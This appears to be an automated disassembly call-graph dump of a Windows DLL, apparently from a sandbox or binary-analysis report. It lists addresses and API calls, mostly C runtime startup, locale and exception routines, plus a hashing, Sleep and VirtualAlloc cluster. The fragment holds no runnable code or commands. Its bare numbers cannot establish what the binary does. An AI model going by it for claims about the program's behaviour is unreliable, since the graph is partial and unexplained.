18245->18244 18361 6da81eb0 18246->18361 18252 6da81fe7 18252->17774 18261 6da8da0b ___std_exception_copy 41 API calls 18260->18261 18262 6da8dade 18261->18262 18263 6da8daec __Getctype 11 API calls 18262->18263 18264 6da8daeb 18263->18264 18266 6da82397 18265->18266 18267 6da8234a std::ios_base::_Ios_base_dtor 18265->18267 18266->17637 18267->18266 18268 6da8dacf 41 API calls 18267->18268 18269 6da8239f 18268->18269 18270 6da82340 41 API calls 18269->18270 18272 6da8939e 18271->18272 18274 6da893b8 18272->18274 18275 6da911a2 std::_Facet_Register 2 API calls 18272->18275 18277 6da81420 Concurrency::cancel_current_task 18272->18277 18302 6da8db20 18272->18302 18274->18161 18275->18272 18276 6da893c4 18276->18276 18277->18276 18291 6da8aa9d 18277->18291 18279 6da8143c 18294 6da8a701 18279->18294 18309 6da88849 18282->18309 18286 6da8142e Concurrency::cancel_current_task 18285->18286 18287 6da8aa9d Concurrency::cancel_current_task RaiseException 18286->18287 18288 6da8143c 18287->18288 18289 6da8a701 ___std_exception_copy 42 API calls 18288->18289 18290 6da81463 18289->18290 18292 6da8aae4 RaiseException 18291->18292 18293 6da8aab7 18291->18293 18292->18279 18293->18292 18295 6da81463 18294->18295 18296 6da8a70e 18294->18296 18295->18161 18296->18295 18297 6da8db20 ___std_exception_copy 15 API calls 18296->18297 18298 6da8a72b 18297->18298 18299 6da8a73b 18298->18299 18300 6da92110 ___std_exception_copy 41 API calls 18298->18300 18301 6da8dcf4 ___vcrt_freefls@4 14 API calls 18299->18301 18300->18299 18301->18295 18307 6da9458b __Getctype 18302->18307 18303 6da945c9 18304 6da90403 __dosmaperr 14 API calls 18303->18304 18306 6da945c7 18304->18306 18305 6da945b4 RtlAllocateHeap 18305->18306 18305->18307 18306->18272 18307->18303 18307->18305 18308 6da911a2 std::_Facet_Register 2 API calls 18307->18308 18308->18307 18314 6da8876c 18309->18314 18312 6da8aa9d Concurrency::cancel_current_task RaiseException 18313 6da88868 18312->18313 18317 6da82490 18314->18317 18318 6da8a701 ___std_exception_copy 42 API calls 18317->18318 18319 6da824bd 18318->18319 18319->18312 18321 6da8402b 18320->18321 18322 6da84032 18321->18322 18323 6da84084 18321->18323 18324 6da84065 18321->18324 18322->18176 18329 6da89399 std::_Facet_Register 43 API calls 18323->18329 18332 6da84079 _Yarn 18323->18332 18325 6da840ba 18324->18325 18326 6da8406c 18324->18326 18327 6da81420 Concurrency::cancel_current_task 43 API calls 18325->18327 18328 6da89399 std::_Facet_Register 43 API calls 18326->18328 18330 6da84072 18327->18330 18328->18330 18329->18332 18331 6da8dacf 41 API calls 18330->18331 18330->18332 18333 6da840c4 18331->18333 18332->18176 18342 6da83840 18333->18342 18335 6da840db std::ios_base::_Ios_base_dtor 18335->18176 18337 6da88849 43 API calls 18336->18337 18338 6da819ea std::ios_base::_Ios_base_dtor 18337->18338 18339 6da8dacf 41 API calls 18338->18339 18340 6da81ae4 std::ios_base::_Ios_base_dtor 18338->18340 18341 6da81b08 18339->18341 18340->18170 18343 6da8384f 18342->18343 18344 6da8388a std::ios_base::_Ios_base_dtor 18342->18344 18343->18344 18345 6da8dacf 41 API calls 18343->18345 18344->18335 18346 6da8390e 18345->18346 18346->18335 18348 6da819d2 18347->18348 18349 6da818c5 18347->18349 18351 6da819e0 43 API calls 18348->18351 18350 6da818df 18349->18350 18353 6da81924 18349->18353 18352 6da819d7 18350->18352 18354 6da89399 std::_Facet_Register 43 API calls 18350->18354 18351->18352 18355 6da81420 Concurrency::cancel_current_task 43 API calls 18352->18355 18357 6da89399 std::_Facet_Register 43 API calls 18353->18357 18359 6da818ef _Yarn 18353->18359 18354->18359 18356 6da819dc 18355->18356 18357->18359 18358 6da8dacf 41 API calls 18358->18348 18359->18358 18360 6da819a5 std::ios_base::_Ios_base_dtor 18359->18360 18360->18192 18362 6da8db20 ___std_exception_copy 15 API calls 18361->18362 18363 6da81ece 18362->18363 18363->18363 18389 6da82e60 CryptAcquireContextA 18363->18389 18365 6da81f34 18366 6da820d0 41 API calls 18365->18366 18367 6da81f42 18366->18367 18368 6da81f68 std::ios_base::_Ios_base_dtor 18367->18368 18371 6da81f89 18367->18371 18369 6da8dcf4 ___vcrt_freefls@4 14 API calls 18368->18369 18370 6da81f78 18369->18370 18374 6da81e40 18370->18374 18372 6da8dacf 41 API calls 18371->18372 18373 6da81f8e 18372->18373 18376 6da81e50 18374->18376 18375 6da81e98 18378 6da81b10 VirtualAlloc 18375->18378 18376->18375 18377 6da81e7d Sleep 18376->18377 18377->18376 18379 6da81bae std::ios_base::_Ios_base_dtor ___from_strstr_to_strchr 18378->18379 18381 6da81d8d _Yarn ___from_strstr_to_strchr 18378->18381 18379->18381 18382 6da81770 43 API calls 18379->18382 18383 6da81e0d DebugBreak 18379->18383 18384 6da82160 43 API calls 18379->18384 18385 6da81e39 18379->18385 18388 6da82340 41 API calls 18379->18388 18847 6da8db50 18379->18847 18381->18252 18382->18379 18383->18381 18384->18379 18386 6da8dacf 41 API calls 18385->18386 18387 6da81e3e 18386->18387 18388->18379 18390 6da82eaf CryptCreateHash 18389->18390 18391 6da82ef7 18389->18391 18392 6da82eee CryptReleaseContext 18390->18392 18393 6da82ed2 CryptHashData 18390->18393 18394 6da81770 43 API calls 18391->18394 18392->18391 18395 6da82f2f CryptGetHashParam 18393->18395 18396 6da82ee3 CryptDestroyHash 18393->18396 18397 6da82f1c 18394->18397 18395->18396 18398 6da82f56 18395->18398 18396->18392 18397->18365 18399 6da82fe0 CryptGetHashParam 18398->18399 18402 6da82f81 18398->18402 18403 6da83265 18398->18403 18400 6da83068 18399->18400 18401 6da82ffd CryptDestroyHash CryptReleaseContext 18399->18401 18429 6da83bd0 18400->18429 18408 6da81770 43 API calls 18401->18408 18404 6da82f89 18402->18404 18405 6da82fb0 18402->18405 18406 6da819e0 43 API calls 18403->18406 18409 6da8326a 18404->18409 18410 6da82f94 18404->18410 18411 6da89399 std::_Facet_Register 43 API calls 18405->18411 18406->18409 18428 6da83036 std::ios_base::_Ios_base_dtor 18408->18428 18413 6da81420 Concurrency::cancel_current_task 43 API calls 18409->18413 18412 6da89399 std::_Facet_Register 43 API calls 18410->18412 18415 6da82f9a IsInExceptionSpec 18411->18415 18412->18415 18413->18428 18414 6da830f6 CryptDestroyHash CryptReleaseContext 18419 6da83149 18414->18419 18415->18399 18415->18428 18416 6da8305f std::ios_base::_Ios_base_dtor 18416->18365 18417 6da8dacf 41 API calls 18420 6da83274 18417->18420 18422 6da831a8 18419->18422 18425 6da81770 43 API calls 18419->18425 18423 6da83840 41 API calls 18420->18423 18421 6da83074 18421->18414 18424 6da830f3 18421->18424 18444 6da83e00 18421->18444 18426 6da83840 41 API calls 18422->18426 18427 6da832be std::ios_base::_Ios_base_dtor 18423->18427 18424->18414 18425->18422 18426->18428 18427->18365 18428->18416 18428->18417 18453 6da82d40 18429->18453 18431 6da83ca4 18432 6da89399 std::_Facet_Register 43 API calls 18431->18432 18433 6da83cab 18432->18433 18464 6da88ab9 18433->18464 18435 6da83cbe 18476 6da85a50 18435->18476 18438 6da83d35 18440 6da89399 std::_Facet_Register 43 API calls 18438->18440 18439 6da82d40 43 API calls 18439->18438 18441 6da83d67 18440->18441 18442 6da88ab9 std::locale::_Init 47 API calls 18441->18442 18443 6da83d77 18442->18443 18443->18421 18812 6da84b20 18444->18812 18447 6da82d40 43 API calls 18449 6da83f29 18447->18449 18450 6da83f41 18449->18450 18843 6da85980 18449->18843 18450->18421 18452 6da83e64 18452->18447 18454 6da82d61 18453->18454 18455 6da82d59 18453->18455 18454->18431 18456 6da8aa9d Concurrency::cancel_current_task RaiseException 18455->18456 18457 6da82d70 18455->18457 18456->18457 18501 6da82c70 18457->18501 18459 6da82da0 18460 6da8aa9d Concurrency::cancel_current_task RaiseException 18459->18460 18461 6da82daf 18460->18461 18462 6da8a701 ___std_exception_copy 42 API calls 18461->18462 18463 6da82dd4 18462->18463 18463->18431 18465 6da88ac5 __EH_prolog3 18464->18465 18555 6da888d6 18465->18555 18470 6da88ae3 18567 6da88c41 18470->18567 18471 6da88b41 std::locale::_Init 18471->18435 18475 6da88b01 18577 6da8892e 18475->18577 18477 6da888d6 std::_Lockit::_Lockit 7 API calls 18476->18477 18478 6da85a8b 18477->18478 18479 6da888d6 std::_Lockit::_Lockit 7 API calls 18478->18479 18482 6da85acd 18478->18482 18480 6da85aad 18479->18480 18483 6da8892e std::_Lockit::~_Lockit 2 API calls 18480->18483 18481 6da8892e std::_Lockit::~_Lockit 2 API calls 18484 6da83cf1 18481->18484 18485 6da89399 std::_Facet_Register 43 API calls 18482->18485 18500 6da85ae8 18482->18500 18483->18482 18484->18438 18484->18439 18486 6da85b33 18485->18486 18487 6da888d6 std::_Lockit::_Lockit 7 API calls 18486->18487 18488 6da85b60 18487->18488 18489 6da85b9e 18488->18489 18490 6da85bf2 18488->18490 18656 6da88bb9 18489->18656 18697 6da88889 18490->18697 18500->18481 18502 6da82cc0 18501->18502 18502->18502 18503 6da81770 43 API calls 18502->18503 18504 6da82cd4 18503->18504 18519 6da825b0 18504->18519 18506 6da82ce8 18507 6da82d0e std::ios_base::_Ios_base_dtor 18506->18507 18508 6da8dacf 41 API calls 18506->18508 18507->18459 18510 6da82d38 18508->18510 18509 6da82d61 18509->18459 18510->18509 18511 6da8aa9d Concurrency::cancel_current_task RaiseException 18510->18511 18512 6da82d70 18510->18512 18511->18512 18513 6da82c70 43 API calls 18512->18513 18514 6da82da0 18513->18514 18515 6da8aa9d Concurrency::cancel_current_task RaiseException 18514->18515 18516 6da82daf 18515->18516 18517 6da8a701 ___std_exception_copy 42 API calls 18516->18517 18518 6da82dd4 18517->18518 18518->18459 18520 6da84000 43 API calls 18519->18520 18521 6da825f1 18520->18521 18522 6da82614 18521->18522 18536 6da85ea0 18521->18536 18524 6da8267d _Yarn 18522->18524 18525 6da85ea0 43 API calls 18522->18525 18526 6da826dc std::ios_base::_Ios_base_dtor 18524->18526 18528 6da8279c 18524->18528 18525->18524 18527 6da8a701 ___std_exception_copy 42 API calls 18526->18527 18531 6da8273a 18527->18531 18529 6da8dacf 41 API calls 18528->18529 18529->18531 18530 6da82769 std::ios_base::_Ios_base_dtor 18530->18506 18531->18530 18532 6da8dacf 41 API calls 18531->18532 18533 6da827a6 18532->18533 18551 6da8a764 18533->18551 18535 6da827c5 std::ios_base::_Ios_base_dtor 18535->18506 18537 6da85fe2 18536->18537 18538 6da85ec5 18536->18538 18539 6da814c0 43 API calls 18537->18539 18542 6da85f30 18538->18542 18543 6da85f23 18538->18543 18545 6da85eda 18538->18545 18540 6da85fe7 18539->18540 18541 6da81420 Concurrency::cancel_current_task 43 API calls 18540->18541 18549 6da85ee7 _Yarn 18541->18549 18547 6da89399 std::_Facet_Register 43 API calls 18542->18547 18542->18549 18543->18540 18543->18545 18544 6da89399 std::_Facet_Register 43 API calls 18544->18549 18545->18544 18546 6da8dacf 41 API calls 18548 6da85ff1 18546->18548 18547->18549 18549->18546 18550 6da85fa0 std::ios_base::_Ios_base_dtor _Yarn 18549->18550 18550->18522 18552 6da8a778 18551->18552 18553 6da8a771 18551->18553 18552->18535 18554 6da8dcf4 ___vcrt_freefls@4 14 API calls 18553->18554 18554->18552 18556 6da888ec 18555->18556 18557 6da888e5 18555->18557 18560 6da888ea 18556->18560 18589 6da890e3 RtlEnterCriticalSection 18556->18589 18584 6da8fb71 18557->18584 18560->18475 18561 6da88c1e 18560->18561 18562 6da89399 std::_Facet_Register 43 API calls 18561->18562 18564 6da88c29 18562->18564 18563 6da88c3d 18563->18470 18564->18563 18638 6da8894d 18564->18638 18568 6da88c4d 18567->18568 18569 6da88aeb 18567->18569 18641 6da89167 18568->18641 18571 6da88a11 18569->18571 18572 6da88a1f 18571->18572 18576 6da88a4a _Yarn 18571->18576 18573 6da88a2b 18572->18573 18574 6da8dcf4 ___vcrt_freefls@4 14 API calls 18572->18574 18575 6da8db20 ___std_exception_copy 15 API calls 18573->18575 18573->18576 18574->18573 18575->18576 18576->18475 18578 6da88938 18577->18578 18579 6da8fb7f 18577->18579 18580 6da8894b 18578->18580 18654 6da890f1 RtlLeaveCriticalSection 18578->18654 18655 6da8fb5a RtlLeaveCriticalSection 18579->18655 18580->18471 18583 6da8fb86 18583->18471 18590 6da969e8 18584->18590 18589->18560 18611 6da963f4 18590->18611 18607 6da964de std::_Lockit::_Lockit 5 API calls 18608 6da96a15 18607->18608 18635 6da964c4 18608->18635 18610 6da96a1a 18610->18610 18612 6da965dd std::_Lockit::_Lockit 5 API calls 18611->18612 18613 6da9640a 18612->18613 18614 6da9640e 18613->18614 18615 6da965dd std::_Lockit::_Lockit 5 API calls 18614->18615 18616 6da96424 18615->18616 18617 6da96428 18616->18617 18618 6da965dd std::_Lockit::_Lockit 5 API calls 18617->18618 18619 6da9643e 18618->18619 18620 6da96442 18619->18620 18621 6da965dd std::_Lockit::_Lockit 5 API calls 18620->18621 18622 6da96458 18621->18622 18623 6da9645c 18622->18623 18624 6da965dd std::_Lockit::_Lockit 5 API calls 18623->18624 18625 6da96472 18624->18625 18626 6da96476 18625->18626 18627 6da965dd std::_Lockit::_Lockit 5 API calls 18626->18627 18628 6da9648c 18627->18628 18629 6da96490 18628->18629 18630 6da965dd std::_Lockit::_Lockit 5 API calls 18629->18630 18631 6da964a6 18630->18631 18632 6da964aa 18631->18632 18633 6da965dd std::_Lockit::_Lockit 5 API calls 18632->18633 18634 6da964c0 18633->18634 18634->18607 18636 6da965dd std::_Lockit::_Lockit 5 API calls 18635->18636 18637 6da964da 18636->18637 18637->18610 18639 6da88a11 _Yarn 15 API calls 18638->18639 18640 6da88987 18639->18640 18640->18470 18642 6da90bf9 18641->18642 18643 6da89177 RtlEncodePointer 18641->18643 18644 6da98ccd IsInExceptionSpec 2 API calls 18642->18644 18643->18569 18643->18642 18645 6da90bfe 18644->18645 18646 6da98d12 IsInExceptionSpec 41 API calls 18645->18646 18650 6da90c09 18645->18650 18646->18650 18647 6da90c13 IsProcessorFeaturePresent 18651 6da90c1f 18647->18651 18648 6da90c32 18649 6da916d2 IsInExceptionSpec 23 API calls 18648->18649 18652 6da90c3c 18649->18652 18650->18647 18650->18648 18653 6da8d8c3 IsInExceptionSpec 8 API calls 18651->18653 18653->18648 18654->18580 18655->18583 18702 6da8fddd 18656->18702 18659 6da88a11 _Yarn 15 API calls 18660 6da88bdd 18659->18660 18661 6da88bed 18660->18661 18662 6da8fddd std::_Locinfo::_Locinfo_dtor 68 API calls 18660->18662 18663 6da88a11 _Yarn 15 API calls 18661->18663 18662->18661 18664 6da85ba8 18663->18664 18665 6da88de6 18664->18665 18772 6da8fe39 18665->18772 18667 6da88def __Getctype 18668 6da88e09 18667->18668 18669 6da88e27 18667->18669 18777 6da8fe15 18668->18777 18671 6da8fe15 __Getctype 41 API calls 18669->18671 18672 6da88e10 18671->18672 18782 6da8fe5e 18672->18782 18675 6da85bbe 18677 6da829e0 18675->18677 18805 6da88c04 18677->18805 18680 6da8dcf4 ___vcrt_freefls@4 14 API calls 18683 6da82a11 18680->18683 18681 6da82a28 18682 6da82a3f 18681->18682 18685 6da8dcf4 ___vcrt_freefls@4 14 API calls 18681->18685 18686 6da82a56 18682->18686 18687 6da8dcf4 ___vcrt_freefls@4 14 API calls 18682->18687 18683->18681 18684 6da8dcf4 ___vcrt_freefls@4 14 API calls 18683->18684 18684->18681 18685->18682 18688 6da82a6d 18686->18688 18689 6da8dcf4 ___vcrt_freefls@4 14 API calls 18686->18689 18687->18686 18690 6da82a84 18688->18690 18692 6da8dcf4 ___vcrt_freefls@4 14 API calls 18688->18692 18689->18688 18691 6da8892e std::_Lockit::~_Lockit 2 API calls 18690->18691 18693 6da82a95 18691->18693 18692->18690 18694 6da88a87 18693->18694 18695 6da89399 std::_Facet_Register 43 API calls 18694->18695 18696 6da88a92 18695->18696 18696->18500 18809 6da887e0 18697->18809 18700 6da8aa9d Concurrency::cancel_current_task RaiseException 18701 6da888a8 18700->18701 18703 6da969e8 std::_Lockit::_Lockit 5 API calls 18702->18703 18704 6da8fdea 18703->18704 18707 6da8fb88 18704->18707 18708 6da8fb94 ___scrt_is_nonwritable_in_current_image 18707->18708 18715 6da8fb12 RtlEnterCriticalSection 18708->18715 18710 6da8fba2 18716 6da8fbe3 18710->18716 18715->18710 18741 6da8fd42 18716->18741 18718 6da8fbfe 18719 6da92bdc __Getctype 41 API calls 18718->18719 18737 6da8fbaf 18718->18737 18720 6da8fc0b 18719->18720 18765 6da970d6 18720->18765 18723 6da8fc37 18726 6da8daec __Getctype 11 API calls 18723->18726 18723->18737 18724 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 18725 6da8fc5c 18724->18725 18728 6da970d6 std::_Locinfo::_Locinfo_dtor 43 API calls 18725->18728 18725->18737 18727 6da8fd41 18726->18727 18729 6da8fc78 18728->18729 18730 6da8fc9a 18729->18730 18731 6da8fc7f 18729->18731 18734 6da94760 ___free_lconv_mon 14 API calls 18730->18734 18735 6da8fcc5 18730->18735 18731->18723 18732 6da8fc91 18731->18732 18733 6da94760 ___free_lconv_mon 14 API calls 18732->18733 18733->18737 18734->18735 18736 6da94760 ___free_lconv_mon 14 API calls 18735->18736 18735->18737 18736->18737 18738 6da8fbd7 18737->18738 18771 6da8fb5a RtlLeaveCriticalSection 18738->18771 18740 6da88bc5 18740->18659 18742 6da8fd5c 18741->18742 18743 6da8fd4e 18741->18743 18745 6da96d14 std::_Locinfo::_Locinfo_dtor 43 API calls 18742->18745 18744 6da938aa std::_Locinfo::_Locinfo_dtor 65 API calls 18743->18744 18746 6da8fd58 18744->18746 18747 6da8fd73 18745->18747 18746->18718 18748 6da8fdd2 18747->18748 18749 6da9479a __Getctype 14 API calls 18747->18749 18751 6da8daec __Getctype 11 API calls 18748->18751 18750 6da8fd8e 18749->18750 18753 6da96d14 std::_Locinfo::_Locinfo_dtor 43 API calls 18750->18753 18763 6da8fdb6 18750->18763 18752 6da8fddc 18751->18752 18756 6da969e8 std::_Lockit::_Lockit 5 API calls 18752->18756 18755 6da8fda5 18753->18755 18754 6da94760 ___free_lconv_mon 14 API calls 18757 6da8fdcb 18754->18757 18758 6da8fdb8 18755->18758 18759 6da8fdac 18755->18759 18760 6da8fdea 18756->18760 18757->18718 18761 6da938aa std::_Locinfo::_Locinfo_dtor 65 API calls 18758->18761 18759->18748 18759->18763 18762 6da8fb88 std::_Locinfo::_Locinfo_dtor 68 API calls 18760->18762 18761->18763 18764 6da8fe13 18762->18764 18763->18754 18764->18718 18766 6da970ea ___std_exception_copy 18765->18766 18767 6da96d51 std::_Locinfo::_Locinfo_dtor 43 API calls 18766->18767 18768 6da97102 18767->18768 18769 6da8d7fb ___std_exception_copy 41 API calls 18768->18769 18770 6da8fc30 18769->18770 18770->18723 18770->18724 18771->18740 18773 6da92bdc __Getctype 41 API calls 18772->18773 18774 6da8fe44 18773->18774 18775 6da946a4 __Getctype 41 API calls 18774->18775 18776 6da8fe54 18775->18776 18776->18667 18778 6da92bdc __Getctype 41 API calls 18777->18778 18779 6da8fe20 18778->18779 18780 6da946a4 __Getctype 41 API calls 18779->18780 18781 6da8fe30 18780->18781 18781->18672 18783 6da92bdc __Getctype 41 API calls 18782->18783 18784 6da8fe69 18783->18784 18785 6da946a4 __Getctype 41 API calls 18784->18785 18786 6da88e38 18785->18786 18786->18675 18787 6da90307 18786->18787 18788 6da90314 18787->18788 18793 6da9034f 18787->18793 18789 6da8db20 ___std_exception_copy 15 API calls 18788->18789 18790 6da90337 18789->18790 18790->18793 18796 6da976eb 18790->18796 18793->18675 18794 6da8daec __Getctype 11 API calls 18795 6da90365 18794->18795 18797 6da976f9 18796->18797 18798 6da97707 18796->18798 18797->18798 18802 6da97721 18797->18802 18799 6da90403 __dosmaperr 14 API calls 18798->18799 18804 6da97711 18799->18804 18800 6da8dabf ___std_exception_copy 41 API calls 18801 6da90348 18800->18801 18801->18793 18801->18794 18802->18801 18803 6da90403 __dosmaperr 14 API calls 18802->18803 18803->18804 18804->18800 18806 6da82a01 18805->18806 18807 6da88c10 18805->18807 18806->18680 18806->18683 18808 6da8fddd std::_Locinfo::_Locinfo_dtor 68 API calls 18807->18808 18808->18806 18810 6da82490 std::invalid_argument::invalid_argument 42 API calls 18809->18810 18811 6da887f2 18810->18811 18811->18700 18813 6da84b55 18812->18813 18814 6da83e34 18813->18814 18815 6da84b20 43 API calls 18813->18815 18814->18452 18820 6da85c00 18814->18820 18816 6da84ba3 18815->18816 18817 6da84bd0 18816->18817 18818 6da82d40 43 API calls 18816->18818 18817->18814 18819 6da85980 43 API calls 18817->18819 18818->18817 18819->18814 18821 6da888d6 std::_Lockit::_Lockit 7 API calls 18820->18821 18822 6da85c28 18821->18822 18823 6da888d6 std::_Lockit::_Lockit 7 API calls 18822->18823 18827 6da85c68 18822->18827 18824 6da85c48 18823->18824 18828 6da8892e std::_Lockit::~_Lockit 2 API calls 18824->18828 18825 6da85c83 18826 6da8892e std::_Lockit::~_Lockit 2 API calls 18825->18826 18829 6da85c8b 18826->18829 18827->18825 18830 6da89399 std::_Facet_Register 43 API calls 18827->18830 18828->18827 18829->18452 18831 6da85cc9 18830->18831 18832 6da888d6 std::_Lockit::_Lockit 7 API calls 18831->18832 18833 6da85cf6 18832->18833 18834 6da85d78 18833->18834 18835 6da85d34 18833->18835 18837 6da88889 43 API calls 18834->18837 18836 6da88bb9 std::_Locinfo::_Locinfo_ctor 69 API calls 18835->18836 18838 6da85d3e 18836->18838 18839 6da85d82 18837->18839 18840 6da829e0 69 API calls 18838->18840 18841 6da85d56 18840->18841 18842 6da88a87 std::_Facet_Register 43 API calls 18841->18842 18842->18825 18844 6da859e1 18843->18844 18845 6da859b6 18843->18845 18844->18450 18845->18844 18846 6da82d40 43 API calls 18845->18846 18846->18844 18848 6da8db83 18847->18848 18849 6da8db67 18847->18849 18850 6da92bdc __Getctype 41 API calls 18848->18850 18849->18379 18851 6da8db88 18850->18851 18852 6da946a4 __Getctype 41 API calls 18851->18852 18853 6da8db98 18852->18853 18853->18849 18856 6da945d9 18853->18856 18857 6da90416 std::_Locinfo::_Locinfo_dtor 41 API calls 18856->18857 18858 6da945f6 18857->18858 18859 6da973ab std::_Locinfo::_Locinfo_dtor 44 API calls 18858->18859 18862 6da94606 18858->18862 18859->18862 18860 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18861 6da8dbca 18860->18861 18861->18379 18862->18860 16984 6da89b6e 16985 6da89b7c 16984->16985 16986 6da89b77 16984->16986 16990 6da89a38 16985->16990 17005 6da8a039 16986->17005 16991 6da89a44 ___scrt_is_nonwritable_in_current_image 16990->16991 16992 6da89a6d dllmain_raw 16991->16992 16993 6da89a53 16991->16993 16995 6da89a68 16991->16995 16992->16993 16994 6da89a87 dllmain_crt_dispatch 16992->16994 16994->16993 16994->16995 17009 6da864f0 16995->17009 16998 6da89ad9 16998->16993 16999 6da89ae2 dllmain_crt_dispatch 16998->16999 16999->16993 17001 6da89af5 dllmain_raw 16999->17001 17000 6da864f0 __DllMainCRTStartup@12 GetCommandLineA 17002 6da89ac0 17000->17002 17001->16993 17012 6da89988 17002->17012 17004 6da89ace dllmain_raw 17004->16998 17006 6da8a04f 17005->17006 17008 6da8a058 17006->17008 17192 6da89fec GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17006->17192 17008->16985 17010 6da864f9 GetCommandLineA 17009->17010 17011 6da86507 17009->17011 17010->17011 17011->16998 17011->17000 17013 6da89994 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 17012->17013 17014 6da89a30 17013->17014 17015 6da899c5 17013->17015 17031 6da8999d 17013->17031 17060 6da89ec6 IsProcessorFeaturePresent 17014->17060 17039 6da89623 17015->17039 17018 6da899ca 17048 6da8a090 17018->17048 17020 6da899cf __RTC_Initialize __DllMainCRTStartup@12 17051 6da897c4 17020->17051 17021 6da89a37 ___scrt_is_nonwritable_in_current_image 17022 6da89a6d dllmain_raw 17021->17022 17024 6da89a53 17021->17024 17025 6da89a68 17021->17025 17023 6da89a87 dllmain_crt_dispatch 17022->17023 17022->17024 17023->17024 17023->17025 17024->17004 17028 6da864f0 __DllMainCRTStartup@12 GetCommandLineA 17025->17028 17030 6da89aa8 17028->17030 17032 6da89ad9 17030->17032 17034 6da864f0 __DllMainCRTStartup@12 GetCommandLineA 17030->17034 17031->17004 17032->17024 17033 6da89ae2 dllmain_crt_dispatch 17032->17033 17033->17024 17035 6da89af5 dllmain_raw 17033->17035 17036 6da89ac0 17034->17036 17035->17024 17037 6da89988 __DllMainCRTStartup@12 84 API calls 17036->17037 17038 6da89ace dllmain_raw 17037->17038 17038->17032 17040 6da89628 ___scrt_release_startup_lock 17039->17040 17041 6da8962c 17040->17041 17044 6da89638 __DllMainCRTStartup@12 17040->17044 17042 6da91eb8 __DllMainCRTStartup@12 14 API calls 17041->17042 17043 6da89636 17042->17043 17043->17018 17045 6da89645 17044->17045 17046 6da91505 IsInExceptionSpec 23 API calls 17044->17046 17045->17018 17047 6da916ce 17046->17047 17047->17018 17064 6da8c3ee RtlInterlockedFlushSList 17048->17064 17052 6da897d0 17051->17052 17053 6da897e6 17052->17053 17068 6da92075 17052->17068 17057 6da89a2a 17053->17057 17055 6da897de 17073 6da8c393 17055->17073 17175 6da89646 17057->17175 17061 6da89edc IsInExceptionSpec 17060->17061 17062 6da89f87 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17061->17062 17063 6da89fd2 IsInExceptionSpec 17062->17063 17063->17021 17065 6da8c3fe 17064->17065 17066 6da8a09a 17064->17066 17065->17066 17067 6da8dcf4 ___vcrt_freefls@4 14 API calls 17065->17067 17066->17020 17067->17065 17069 6da92080 17068->17069 17070 6da92092 ___scrt_uninitialize_crt 17068->17070 17071 6da9208e 17069->17071 17079 6da9a6e6 17069->17079 17070->17055 17071->17055 17074 6da8c39c 17073->17074 17075 6da8c3a6 17073->17075 17148 6da8c56d 17074->17148 17075->17053 17082 6da9a573 17079->17082 17085 6da9a4c7 17082->17085 17086 6da9a4d3 ___scrt_is_nonwritable_in_current_image 17085->17086 17093 6da8fb12 RtlEnterCriticalSection 17086->17093 17088 6da9a549 17102 6da9a567 17088->17102 17089 6da9a4dd ___scrt_uninitialize_crt 17089->17088 17094 6da9a43b 17089->17094 17093->17089 17095 6da9a447 ___scrt_is_nonwritable_in_current_image 17094->17095 17105 6da95719 RtlEnterCriticalSection 17095->17105 17097 6da9a451 ___scrt_uninitialize_crt 17098 6da9a48a 17097->17098 17106 6da9a681 17097->17106 17119 6da9a4bb 17098->17119 17147 6da8fb5a RtlLeaveCriticalSection 17102->17147 17104 6da9a555 17104->17071 17105->17097 17107 6da9a696 ___std_exception_copy 17106->17107 17108 6da9a6a8 17107->17108 17109 6da9a69d 17107->17109 17122 6da9a618 17108->17122 17110 6da9a573 ___scrt_uninitialize_crt 70 API calls 17109->17110 17112 6da9a6a3 17110->17112 17114 6da8d7fb ___std_exception_copy 41 API calls 17112->17114 17115 6da9a6e0 17114->17115 17115->17098 17117 6da9a6c9 17135 6da9faf8 17117->17135 17146 6da9572d RtlLeaveCriticalSection 17119->17146 17121 6da9a4a9 17121->17089 17123 6da9a631 17122->17123 17127 6da9a658 17122->17127 17124 6da955de ___scrt_uninitialize_crt 41 API calls 17123->17124 17123->17127 17125 6da9a64d 17124->17125 17126 6daa0325 ___scrt_uninitialize_crt 66 API calls 17125->17126 17126->17127 17127->17112 17128 6da955de 17127->17128 17129 6da955ea 17128->17129 17130 6da955ff 17128->17130 17131 6da90403 __dosmaperr 14 API calls 17129->17131 17130->17117 17132 6da955ef 17131->17132 17133 6da8dabf ___std_exception_copy 41 API calls 17132->17133 17134 6da955fa 17133->17134 17134->17117 17136 6da9fb09 17135->17136 17137 6da9fb16 17135->17137 17138 6da90403 __dosmaperr 14 API calls 17136->17138 17139 6da9fb5f 17137->17139 17141 6da9fb3d 17137->17141 17145 6da9fb0e 17138->17145 17140 6da90403 __dosmaperr 14 API calls 17139->17140 17142 6da9fb64 17140->17142 17143 6da9fa56 ___scrt_uninitialize_crt 45 API calls 17141->17143 17144 6da8dabf ___std_exception_copy 41 API calls 17142->17144 17143->17145 17144->17145 17145->17112 17146->17121 17147->17104 17149 6da8c3a1 17148->17149 17150 6da8c577 17148->17150 17152 6da8d4e3 17149->17152 17156 6da8d630 17150->17156 17153 6da8d50d 17152->17153 17154 6da8d4ee 17152->17154 17153->17075 17155 6da8d4f8 RtlDeleteCriticalSection 17154->17155 17155->17153 17155->17155 17161 6da8d5ac 17156->17161 17159 6da8d662 TlsFree 17160 6da8d656 17159->17160 17160->17149 17162 6da8d5e7 17161->17162 17163 6da8d5c4 17161->17163 17162->17159 17162->17160 17163->17162 17167 6da8d512 17163->17167 17166 6da8d5d9 GetProcAddress 17166->17162 17173 6da8d51e ___vcrt_FlsFree 17167->17173 17168 6da8d592 17168->17162 17168->17166 17169 6da8d534 LoadLibraryExW 17170 6da8d599 17169->17170 17171 6da8d552 GetLastError 17169->17171 17170->17168 17172 6da8d5a1 FreeLibrary 17170->17172 17171->17173 17172->17168 17173->17168 17173->17169 17174 6da8d574 LoadLibraryExW 17173->17174 17174->17170 17174->17173 17180 6da920a5 17175->17180 17178 6da8c56d ___vcrt_uninitialize_ptd 6 API calls 17179 6da89a2f 17178->17179 17179->17031 17183 6da92ead 17180->17183 17184 6da8964d 17183->17184 17185 6da92eb7 17183->17185 17184->17178 17187 6da96752 17185->17187 17188 6da965dd std::_Lockit::_Lockit 5 API calls 17187->17188 17189 6da9676e 17188->17189 17190 6da96789 TlsFree 17189->17190 17191 6da96777 